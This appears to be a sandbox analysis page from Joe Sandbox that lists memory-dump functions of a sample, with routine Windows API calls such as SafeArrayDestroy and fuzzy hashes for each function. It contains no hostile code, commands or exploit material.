Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 4e8a0c9897911da94c1c96507ee744a998b511ea43b011f074a4fa5d1d5b2a35
Instruction ID: 8cf6c07e557247e94ba280e1aecd41ee73a1aef32ce159d24895af73078ad38b
Opcode Fuzzy Hash: 4e8a0c9897911da94c1c96507ee744a998b511ea43b011f074a4fa5d1d5b2a35
Instruction Fuzzy Hash: DF314CB0A016099FCB00CF69CE84B6DB7B9AF99208F30859AE518E7745C775E9418F50

Function 6CEB908A Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 367cad6ee9af4f116112654b6512c5221d3d9313b525f9fde974d75d850bc6b9
Instruction ID: 78e12da5b81dace4b9350b8c4f8d2f63217c5d4ed9eba9f8d87ed98138aff2b3
Opcode Fuzzy Hash: 367cad6ee9af4f116112654b6512c5221d3d9313b525f9fde974d75d850bc6b9
Instruction Fuzzy Hash: D6312A70E016189FDB00CF68C980B6EB7B9AF89208F30858AE519E7751D775E981CF50

Function 6CEB91A9 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 3dd75c302036c626ed5bc977f063b7711639fb1b3a9a8193ada8ac246d441529
Instruction ID: 27154c9a5e54fd769c1741d6f4ec9ce98f97c7309b2b5d408dfe4a9be8b5b64b
Opcode Fuzzy Hash: 3dd75c302036c626ed5bc977f063b7711639fb1b3a9a8193ada8ac246d441529
Instruction Fuzzy Hash: 32313C70E416189FCB00CFA9CD80B6EB7B9AF89208F30858AE419E7751D775E981CF50

Function 6CEB9118 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 4e8a0c9897911da94c1c96507ee744a998b511ea43b011f074a4fa5d1d5b2a35
Instruction ID: 1c6782cb670181e2e336be0602cc6f638fda7b2223004e748e52f106198215fe
Opcode Fuzzy Hash: 4e8a0c9897911da94c1c96507ee744a998b511ea43b011f074a4fa5d1d5b2a35
Instruction Fuzzy Hash: 5C313C71E016089FDB00CF69CD80BAEB7B9AF89208F30859AE519E7751D775E981CF50

Function 6CEB92C5 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 1dedc86250a47239049d0da5eb7f2d9ea96b2b3b9515ed5713818baec625c288
Instruction ID: cee8eb5fb97670424921dfb3346a366d46404abef2cf09b2242fc5255f230df7
Opcode Fuzzy Hash: 1dedc86250a47239049d0da5eb7f2d9ea96b2b3b9515ed5713818baec625c288
Instruction Fuzzy Hash: 64312870E016089FDB00CFA8C980BAEB7B9AF89208F30858AE419E7751D775E981CF50

Function 6CEB9237 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: b717b4ac98d7b7d90c6724fe260f24b8dd5280ddabf0ff320f33316e33c512cb
Instruction ID: 8a29a290bbeaa59a11dc25e6cf3f6af405157ca2db75fd7a12a6d4de4f257657
Opcode Fuzzy Hash: b717b4ac98d7b7d90c6724fe260f24b8dd5280ddabf0ff320f33316e33c512cb
Instruction Fuzzy Hash: F3313B70E016089FCB00DFA9CD80B6EB7B9AF89208F30858AE419E7751D775E981CF50

Function 6CEA7370 Relevance: 9.1, APIs: 6, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6CF111FD,000000FF,?,6CEA8B80,00000000,?,00000000,?,6CEA8C13,?,?), ref: 6CEA7415
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6CF111FD,000000FF,?,6CEA8B80,00000000,?,00000000,?,6CEA8C13,?,?), ref: 6CEA741B
std::exception::exception.LIBCMT ref: 6CEA743D
__CxxThrowException@8.LIBCMT ref: 6CEA7452
std::exception::exception.LIBCMT ref: 6CEA7461
__CxxThrowException@8.LIBCMT ref: 6CEA7476

Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
String ID:
API String ID: 189561132-0
Opcode ID: ee65483b06d355ae3ba855153a1c2d6465e391ac7e6816ccdee0bf0b2ab00fb4
Instruction ID: 856ab8118d62e3e43baccd79a59dbe84dede6c8b7fa25a3efcf95e070423731b
Opcode Fuzzy Hash: ee65483b06d355ae3ba855153a1c2d6465e391ac7e6816ccdee0bf0b2ab00fb4
Instruction Fuzzy Hash: F1318BB29046449FC751CF59C880A9AFBF8FF58310B54895EE85A97B00D731F605CBA1

Function 6CEB8C6E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 04a71124eec1266f15032bede2c8fb1ce971f07ab39ab5b12e898db1874695ab
Instruction ID: ff96fa193f956969f48d146be473e2096f404058072bd441ade750040defe063
Opcode Fuzzy Hash: 04a71124eec1266f15032bede2c8fb1ce971f07ab39ab5b12e898db1874695ab
Instruction Fuzzy Hash: 5C312970E416189FDB10DBA9CD80BAEB7B9AF85208F34859AE419E7741C771E981CF50

Function 6CEB8D72 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 1dbc0cb078bd0959133217d36a2e6ff6032a9aafaf621a5f94095e7272368a57
Instruction ID: 7ff516df43157271b60fbf4e00921a57ab1b534c58025479f998d2dcc41161a7
Opcode Fuzzy Hash: 1dbc0cb078bd0959133217d36a2e6ff6032a9aafaf621a5f94095e7272368a57
Instruction Fuzzy Hash: 49313C70E416189FCB10CFA9CD80BAEB7B9AF85208F34868AE459E7745D771E981CF50

Function 6CEB8E8E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 79a8481db9707c0c7793648626287ed366d25ed449e8f48e297b30a067fac0fe
Instruction ID: d1115cb646a25011f5ee8d4e5029cb340ac32bcb2d4edeabaabce0563c6ff5dd
Opcode Fuzzy Hash: 79a8481db9707c0c7793648626287ed366d25ed449e8f48e297b30a067fac0fe
Instruction Fuzzy Hash: 4E313C70E016189FDB10CFA9CD80BAEB7B9AF85208F34868AE459E7745C771E981CF50

Function 6CEB8F07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 2f36d265bae95e9729f11afc9ad694381574ff39b579cfd0c070e2866c18c561
Instruction ID: bd8e573882898833c360aadea5a554a1505fb78b126fa261f5f542ac9877cd45
Opcode Fuzzy Hash: 2f36d265bae95e9729f11afc9ad694381574ff39b579cfd0c070e2866c18c561
Instruction Fuzzy Hash: DC311A70A016189FDB10CFA9CD80BAEB7B9AF85308F34859AE559E7741C771D981CF50

Function 6CEB884F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: aa992451a3ca5555bb50b5c95d5feff7e80f287c7bbc7799332b9c55c694ca0a
Instruction ID: c47e91d2e388cae01a2815d5875ea9876e1524e1f429214789d1209cbc9b0da1
Opcode Fuzzy Hash: aa992451a3ca5555bb50b5c95d5feff7e80f287c7bbc7799332b9c55c694ca0a
Instruction Fuzzy Hash: 88313C70E016189FDB10CFA9CD80BAEB7B9AF85208F74858AE419E7741C775E981CF50

Function 6CEB8B64 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 5c0895e87ffee52fdf3361bbcee23bb64d21883d658c8f63abc8e28a1688bf3d
Instruction ID: b1d86ecf0bd6195154509c25e4e84afca4529443025f0b70325f6aa01a39890c
Opcode Fuzzy Hash: 5c0895e87ffee52fdf3361bbcee23bb64d21883d658c8f63abc8e28a1688bf3d
Instruction Fuzzy Hash: 6C313A70E416189FCB10DFA9CD80BAEB7B9AF85208F34858AE419E7741C775E981CF50

Function 6CEB0561 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
